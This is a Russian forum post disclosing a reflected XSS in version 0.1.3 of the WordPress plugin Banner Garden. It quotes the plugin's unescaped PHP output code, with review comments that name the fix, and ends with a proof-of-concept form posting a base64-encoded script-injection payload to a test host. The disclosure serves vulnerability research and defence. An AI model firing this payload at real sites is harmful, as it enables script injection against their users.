
15.05.2010, 10:55
Banner Garden Версия 0.1.3
скачал туто: http://wordpress.org/extend
bg-plugin-ajax.php - в корне плагина.
Пассивная XSS (значения picture и link из POST-запроса попадают в атрибут value без экранирования)
PHP код:
// Stand-alone AJAX endpoint: it is requested directly and boots WordPress itself through wp-config.php.
header('Content-type: text/html; charset=UTF-8');
require_once ("../../../wp-config.php");
load_plugin_textdomain( 'bannergarden', false, dirname( plugin_basename( __FILE__ )).'/localization' );
require_once ("bannergarden.class.php");
// $bg is assigned only when the class is defined; the switch below uses it unconditionally.
if (class_exists('BannerGarden')) {
$bg = new BannerGarden();
}
// NOTE(review): no login, capability or nonce check is visible in this excerpt before $_POST is read — confirm against the full file.
switch ($_POST["type"]) {
case "pic":
// 'picture' and 'link' are base64-decoded from the request and handed on unchanged; 'nw' is passed as received.
// Nothing here validates or escapes them, so the markup built from them below carries request-controlled text.
$val_arr = array('picture' => base64_decode($_POST["picture"]),
'link' => base64_decode($_POST["link"]),
'new_window' => $_POST["nw"]);
$frm = $bg->GetBannerAjaxForm('pic',$val_arr);
// The response is declared text/html (header above), so any unescaped markup in $frm is parsed by the browser.
echo $frm;
break;/*...*/
bannergarden.class.php
PHP код:
/*...*/function GetBannerAjaxForm($type,$values = array()) {
// Builds the HTML form fields for one banner type from $values; this excerpt shows only the "pic" branch.
// For "pic" it reads the keys 'picture', 'link' and 'new_window' from $values.
// NOTE(review): the return statement is elided in this excerpt; the caller echoes the result, so $html is presumably returned.
switch ($type) {
/**** Picture ****/
case "pic":
$picture = '';
$link = '';
$nw_checked = '';
// The values are copied as received; no validation or escaping happens between here and the output below.
if (array_key_exists('picture',$values)) {
$picture = $values['picture'];
}
if (array_key_exists('link',$values)) {
$link = $values['link'];
}
if (array_key_exists('new_window',$values)) {
$new_window = $values['new_window'];
// Loose comparison; $new_window itself is never written to $html, only the fixed ' checked="checked"' string is.
if ($new_window == 1) {
$nw_checked = ' checked="checked"';
}
}
$html = '<div class="bg_label">'.__('URL of picture:','bannergarden').'</div>';
$html .= '<small>'.__('Type an image url, or upload / select and image for the banner.','bannergarden').'</small>';
// Sink: $picture is concatenated into a double-quoted value="" attribute without escaping, so a double quote
// in it ends the attribute and the remainder is parsed as markup. Escape at output, e.g. esc_attr($picture).
$html .= '<div class="bg_input"><input type="text" id="adpicture" name="adpicture" value="'.$picture.'" /> <input id="upload_button" type="button" value="'.__('Upload / Select Image','bannergarden').'" /></div>';
$html .= '<div class="bg_label">'.__('Link on click:','bannergarden').'</div>';
$html .= '<small>'.__('Enter a URL where we redirect the user. Use full URL start with "http://" or "https://"','bannergarden').'</small>';
// Sink: same pattern for $link, the field used in the post's demonstration. Escape at output, e.g. esc_attr($link)
// (or esc_url() if only URLs should be accepted here).
$html .= '<div class="bg_input"><input type="text" id="adlink" name="adlink" value="'.$link.'" /></div>';
$html .= '<div class="bg_label">'.__('Open in new window?','bannergarden').'</div>';
$html .= '<small>'.__('Check this box if you want the link to open in a new window.','bannergarden').'</small>';
$html .= '<div class="bg_input"><input type="checkbox" name="adnewwindow" value="1"'.$nw_checked.' /></div>';
break;/*...*/
Результат:
<!-- Demonstration form from the post: it posts type=pic and a base64-encoded "link" value to the plugin's AJAX file
     on a host named "wordpress" (apparently a local test install).
     Decoded (dropping the stray space before "="), the value closes the value="" attribute and adds a script element
     that calls alert(123). Once the plugin escapes the value at output, e.g. with esc_attr(), the same request
     returns it as inert text inside the attribute. -->
<form action="http://wordpress/wp-content/plugins/banner-garden/bg-plugin-ajax.php" method=post>
<input type=hidden name=link value="Ij48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD48YnI =">
<input type=hidden name=type value=pic>
<input type=submit>
</form>